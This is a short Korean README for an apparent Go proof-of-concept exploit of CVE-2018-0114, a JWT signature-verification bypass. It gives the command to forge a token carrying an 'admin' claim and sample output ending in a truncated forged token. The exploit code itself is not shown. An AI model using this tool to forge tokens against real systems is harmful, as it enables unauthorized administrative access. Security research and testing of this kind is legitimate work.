
CVE-2018-0114에 대한 개념 증명 익스플로잇으로, 서명 검증 우회 취약점을 입증하며 임의의 클레임을 가진 위조된 JWT 토큰을 생성합니다.
참조: CVE-2018-0114
참고: 교육 목적으로만 사용하세요.
admin 클레임이 포함된 JWT를 생성하려면 프로젝트 디렉토리에서 다음 명령을 실행하세요:
go run . --claim=admin
____ __ __ ____ ___ __ _ __ __ _ _ __ __
/\ _`\ /\ \/\ \ /\ _`\ /'___`\ /'__`\ /' \ /'_ `\ /'__`\ /' \ /' \ /\ \\ \
\ \ \/\_\ \ \ \ \ \ \ \ \L\_\ /\_\ /\ \ /\ \/\ \ /\_, \ /\ \L\ \ /\ \/\ \ /\_, \ /\_, \ \ \ \\ \
\ \ \/_/_ \ \ \ \ \ \ \ _\L _______ \/_/// /__ \ \ \ \ \ \ \/_/\ \ \/_> _ <_ _______ \ \ \ \ \ \/_/\ \ \/_/\ \ \ \ \\ \_
\ \ \L\ \ \ \ \_/ \ \ \ \L\ \/\______\ // /_\ \ \ \ \_\ \ \ \ \ /\ \L\ \/\______\ \ \ \_\ \ \ \ \ \ \ \ \ \__ ,__\
\ \____/ \ `\___/ \ \____/\/______/ /\______/ \ \____/ \ \_\ \ \____/\/______/ \ \____/ \ \_\ \ \_\ \/_/\_\_/
\/___/ `\/__/ \/___/ \/_____/ \/___/ \/_/ \/___/ \/___/ \/_/ \/_/ \/_/
[x] 페이로드가 "admin"인 JWT 생성 중 ...
[x] 키 생성 완료
[x] 서명 완료
eyJhbGciOiJSUzI1NiIsI.......